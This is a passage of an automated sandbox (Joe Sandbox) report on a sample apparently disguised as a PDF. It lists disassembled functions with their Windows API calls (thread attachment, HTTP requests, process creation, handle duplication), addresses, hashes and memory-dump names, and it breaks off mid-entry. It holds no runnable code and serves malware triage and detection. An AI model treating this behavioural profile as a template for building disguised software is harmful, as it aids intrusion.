                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003830A5,?,00000001), ref: 00384071
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00384083
                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003830A5,?,00000001), ref: 0038409C
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003830A5,?,00000001), ref: 003840AE
                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003830A5,?,00000001), ref: 003840F3
                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003830A5,?,00000001), ref: 00384108
                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003830A5,?,00000001), ref: 00384113
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                    • String ID:
                                                    • API String ID: 2156557900-0
                                                    • Opcode ID: 55ba53e8652202f4311a016b9bd6a696f0f45982ce04e60e82582be4323cc074
                                                    • Instruction ID: db01b4cbfa3a43262fd29ff21cd2141572917160d64b7822c268ebee9e00bbaa
                                                    • Opcode Fuzzy Hash: 55ba53e8652202f4311a016b9bd6a696f0f45982ce04e60e82582be4323cc074
                                                    • Instruction Fuzzy Hash: 4631E6B2500305AFEB12EF54DC49F6ABBADFB50312F118065F905E6690DBB4ED80CB64
                                                    Function 003BDD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 0035B496
                                                    • SetTextColor.GDI32(?,000000FF), ref: 0035B4A0
                                                    • SetBkMode.GDI32(?,00000001), ref: 0035B4B5
                                                    • GetStockObject.GDI32(00000005), ref: 0035B4BD
                                                    • GetClientRect.USER32(?), ref: 003BDD63
                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 003BDD7A
                                                    • GetWindowDC.USER32(?), ref: 003BDD86
                                                    • GetPixel.GDI32(00000000,?,?), ref: 003BDD95
                                                    • ReleaseDC.USER32(?,00000000), ref: 003BDDA7
                                                    • GetSysColor.USER32(00000005), ref: 003BDDC5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                    • String ID:
                                                    • API String ID: 3430376129-0
                                                    • Opcode ID: ffbe3b9062de37feb495efaccbc2a033b0e96e0d1d36104ffc5e1588c2146709
                                                    • Instruction ID: 6fa54f7b4e912c8fa803427e14a95e88dca12ff8aaf369e4aa1e032f4fbc0a09
                                                    • Opcode Fuzzy Hash: ffbe3b9062de37feb495efaccbc2a033b0e96e0d1d36104ffc5e1588c2146709
                                                    • Instruction Fuzzy Hash: 23118E71100205EFDB626FA4EC08FE97B69EB05326F158235FA66E50F1CB321951DF20
                                                    Function 00343093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003430DC
                                                    • CoUninitialize.OLE32(?,00000000), ref: 00343181
                                                    • UnregisterHotKey.USER32(?), ref: 003432A9
                                                    • DestroyWindow.USER32(?), ref: 003B5079
                                                    • FreeLibrary.KERNEL32(?), ref: 003B50F8
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003B5125
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                    • String ID: close all
                                                    • API String ID: 469580280-3243417748
                                                    • Opcode ID: b667cdb92a3509ee4e163f69dfc4a1c1f42508c923340b42a8b8e9d845b111aa
                                                    • Instruction ID: 1770f9e8fbca5b61976457569a04652671d2eb9435f904f9d909cdb225ad8107
                                                    • Opcode Fuzzy Hash: b667cdb92a3509ee4e163f69dfc4a1c1f42508c923340b42a8b8e9d845b111aa
                                                    • Instruction Fuzzy Hash: D09107346002028FC756EF14C895BA8F3E8FF15304F5542A9E50AAF662DB30BE5ACF50
                                                    Function 0035CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowLongW.USER32(?,000000EB), ref: 0035CC15
                                                      • Part of subcall function 0035CCCD: GetClientRect.USER32(?,?), ref: 0035CCF6
                                                      • Part of subcall function 0035CCCD: GetWindowRect.USER32(?,?), ref: 0035CD37
                                                      • Part of subcall function 0035CCCD: ScreenToClient.USER32(?,?), ref: 0035CD5F
                                                    • GetDC.USER32 ref: 003BD137
                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003BD14A
                                                    • SelectObject.GDI32(00000000,00000000), ref: 003BD158
                                                    • SelectObject.GDI32(00000000,00000000), ref: 003BD16D
                                                    • ReleaseDC.USER32(?,00000000), ref: 003BD175
                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003BD200
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                    • String ID: U
                                                    • API String ID: 4009187628-3372436214
                                                    • Opcode ID: f9598d87028423da0e6acb435de51879e6cc525fb90731e4ab9b331d7d4d966f
                                                    • Instruction ID: 439b84be8e144a210346ca432ea98141747a25fdfb96bac855b5916dd4fb1913
                                                    • Opcode Fuzzy Hash: f9598d87028423da0e6acb435de51879e6cc525fb90731e4ab9b331d7d4d966f
                                                    • Instruction Fuzzy Hash: 6C71F230400204DFCF239F68CC81EEA7BB9FF48319F194669EE555AAA6E7318845DF60
                                                    Function 003945C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003945FF
                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0039462B
                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0039466D
                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00394682
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0039468F
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003946BF
                                                    • InternetCloseHandle.WININET(00000000), ref: 00394706
                                                      • Part of subcall function 00395052: GetLastError.KERNEL32(?,?,003943CC,00000000,00000000,00000001), ref: 00395067
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                    • String ID:
                                                    • API String ID: 1241431887-3916222277
                                                    • Opcode ID: 76736d23d3992c57f51f470a28c6b6b452ebd0fdfdc70b89d3996256cd64780d
                                                    • Instruction ID: b2015546ecf6c0e686d9fbc0f453cb014056d38ff7fa44d8f321e676917c3f53
                                                    • Opcode Fuzzy Hash: 76736d23d3992c57f51f470a28c6b6b452ebd0fdfdc70b89d3996256cd64780d
                                                    • Instruction Fuzzy Hash: 5D417CB1501209BFEF139F94CC89FBB77ACFF09304F01412AFA059A191D7B099468BA4
                                                    Function 0039B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,003DDC00), ref: 0039B715
                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003DDC00), ref: 0039B749
                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0039B8C1
                                                    • SysFreeString.OLEAUT32(?), ref: 0039B8EB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                    • String ID:
                                                    • API String ID: 560350794-0
                                                    • Opcode ID: 664b9b0ecf5dafea2a0cd5667fb67b6f504f49d147a45a5ff9fccc18ba93938a
                                                    • Instruction ID: 6dfc2a357b420e851dcad5a2284225e0160aae90defd622f90fbdf92721c24d2
                                                    • Opcode Fuzzy Hash: 664b9b0ecf5dafea2a0cd5667fb67b6f504f49d147a45a5ff9fccc18ba93938a
                                                    • Instruction Fuzzy Hash: 5AF15D75A00209EFCF05DF94D988EAEB7B9FF89315F118498F915AB250DB31AE41CB90
                                                    Function 003A24D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 003A24F5
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003A2688
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003A26AC
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003A26EC
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003A270E
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003A286F
                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003A28A1
                                                    • CloseHandle.KERNEL32(?), ref: 003A28D0
                                                    • CloseHandle.KERNEL32(?), ref: 003A2947
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                    • String ID:
                                                    • API String ID: 4090791747-0
                                                    • Opcode ID: 459212116459880f09faedf28aa7b9d0bc389c15936a88877e303fd51f600d22
                                                    • Instruction ID: 3b9d39897cb8be237bb81bbf5662472535fededceb440bc98ab40426541f0a3b
                                                    • Opcode Fuzzy Hash: 459212116459880f09faedf28aa7b9d0bc389c15936a88877e303fd51f600d22
                                                    • Instruction Fuzzy Hash: 28D19E356043009FC716EF28C851A6ABBE5EF86310F15895DF8999F2A2DB31ED44CB52
                                                    Function 003AB33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003AB3F4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: 724b32f226c746ce4db4f2ade59ea3c0a0aa6ec532a7d2b6bc3c6ba59082274e
                                                    • Instruction ID: 4110de587600ede52eb041b1fc05b3a16f49eabecf2c5c58819a3d21632423ab
                                                    • Opcode Fuzzy Hash: 724b32f226c746ce4db4f2ade59ea3c0a0aa6ec532a7d2b6bc3c6ba59082274e
                                                    • Instruction Fuzzy Hash: 09517C34A00204BFEF279F29CC89FA9BB68EB07314F644115FA55EA5E3C771E9508B51
                                                    Function 0035A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 003BDB1B
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003BDB3C
                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003BDB51
                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 003BDB6E
                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003BDB95
                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0035A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 003BDBA0
                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 003BDBBD
                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0035A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 003BDBC8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                    • String ID:
                                                    • API String ID: 1268354404-0
                                                    • Opcode ID: c5d54778283d15492b189313df79fa81726cc58ef10a1e98b925ceaa28cab423
                                                    • Instruction ID: e270495289bcc913afb9c3c4479fa85feb282dcfd5ce88f9562e2c04ebdb0371
                                                    • Opcode Fuzzy Hash: c5d54778283d15492b189313df79fa81726cc58ef10a1e98b925ceaa28cab423
                                                    • Instruction Fuzzy Hash: 69518C70600608EFDB26DF64CC81FAA77B9AB48755F110628FA46DB6A0D770ED44DB50
                                                    Function 00387555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00386EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00385FA6,?), ref: 00386ED8
                                                      • Part of subcall function 00386EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00385FA6,?), ref: 00386EF1
                                                      • Part of subcall function 003872CB: GetFileAttributesW.KERNEL32(?,00386019), ref: 003872CC
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 003875CA
                                                    • _wcscmp.LIBCMT ref: 003875E2
                                                    • MoveFileW.KERNEL32(?,?), ref: 003875FB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                    • String ID:
                                                    • API String ID: 793581249-0
                                                    • Opcode ID: 533aaf8f0b23b482de4f1b9d145172c83408da2c25fab14e337d2f564cfe10e7
                                                    • Instruction ID: 322171e769116ddb1b17df88633c8fece054c025934b989c457572c7c3644462
                                                    • Opcode Fuzzy Hash: 533aaf8f0b23b482de4f1b9d145172c83408da2c25fab14e337d2f564cfe10e7
                                                    • Instruction Fuzzy Hash: 4D512DB2A092199ADF56FB94D8419DE73BDAF08310B1044EAF609E7541EA70E7C5CB60
                                                    Function 0035EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,003BDAD1,00000004,00000000,00000000), ref: 0035EAEB
                                                    • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,003BDAD1,00000004,00000000,00000000), ref: 0035EB32
                                                    • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,003BDAD1,00000004,00000000,00000000), ref: 003BDC86
                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,003BDAD1,00000004,00000000,00000000), ref: 003BDCF2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ShowWindow
                                                    • String ID:
                                                    • API String ID: 1268545403-0
                                                    • Opcode ID: c52d07fe6d74e8509d3b1ed20e82efb9ebf8be07e71cb5c46a713a6f7ded9aa8
                                                    • Instruction ID: 06d4b648be606e335f7d5e2adc09f6898ba37edf379119cb099d2df977f99a21
                                                    • Opcode Fuzzy Hash: c52d07fe6d74e8509d3b1ed20e82efb9ebf8be07e71cb5c46a713a6f7ded9aa8
                                                    • Instruction Fuzzy Hash: 3F41E47060C280DBD73F4B288D8DE6A7A9EAB41307F1A081DF98786D71D671BA48C311
                                                    Function 0037B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0037AEF1,00000B00,?,?), ref: 0037B26C
                                                    • HeapAlloc.KERNEL32(00000000,?,0037AEF1,00000B00,?,?), ref: 0037B273
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0037AEF1,00000B00,?,?), ref: 0037B288
                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,0037AEF1,00000B00,?,?), ref: 0037B290
                                                    • DuplicateHandle.KERNEL32(00000000,?,0037AEF1,00000B00,?,?), ref: 0037B293
                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0037AEF1,00000B00,?,?), ref: 0037B2A3
                                                    • GetCurrentProcess.KERNEL32(0037AEF1,00000000,?,0037AEF1,00000B00,?,?), ref: 0037B2AB
                                                    • DuplicateHandle.KERNEL32(00000000,?,0037AEF1,00000B00,?,?), ref: 0037B2AE
                                                    • CreateThread.KERNEL32(00000000,00000000,0037B2D4,00000000,00000000,00000000), ref: 0037B2C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                    • String ID:
                                                    • API String ID: 1957940570-0
                                                    • Opcode ID: 93a5d16d1c19976c931772a9e4c21472a55ffe7dd6f0bc5956ec18ab4e20e494
                                                    • Instruction ID: 4e953b330a22574a716e57b2115041de15c976722771aebc4e047e26440c4366
                                                    • Opcode Fuzzy Hash: 93a5d16d1c19976c931772a9e4c21472a55ffe7dd6f0bc5956ec18ab4e20e494
                                                    • Instruction Fuzzy Hash: D601C9B5240348BFE711AFA5DC4DF6B7BACEB88711F058425FA05DB1A1CA74E801CB61
                                                    Function 0039C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                    • API String ID: 0-572801152
                                                    • Opcode ID: a8dfe5555046fb6ea6e134a374ef79c774670d38a8290586add8e82c10c8ee7d
                                                    • Instruction ID: 1c0f68126f59e6148bdbbc5d388cf45ce5e7997e515cf6e73840af3e97706492
                                                    • Opcode Fuzzy Hash: a8dfe5555046fb6ea6e134a374ef79c774670d38a8290586add8e82c10c8ee7d
                                                    • Instruction Fuzzy Hash: 3FE1F471A1021AAFDF16DFA8C881BEE77B9EF48354F158029F905AB281D770AD41CB90
                                                    Function 003916DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                      • Part of subcall function 0035C6F4: _wcscpy.LIBCMT ref: 0035C717
                                                    • _wcstok.LIBCMT ref: 0039184E
                                                    • _wcscpy.LIBCMT ref: 003918DD
                                                    • _memset.LIBCMT ref: 00391910
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                    • String ID: X$p2?l2?
                                                    • API String ID: 774024439-3124981581
                                                    • Opcode ID: 8e7786b734be4175496fcc1418076832c678c136d29933a33ecc2a445feff375
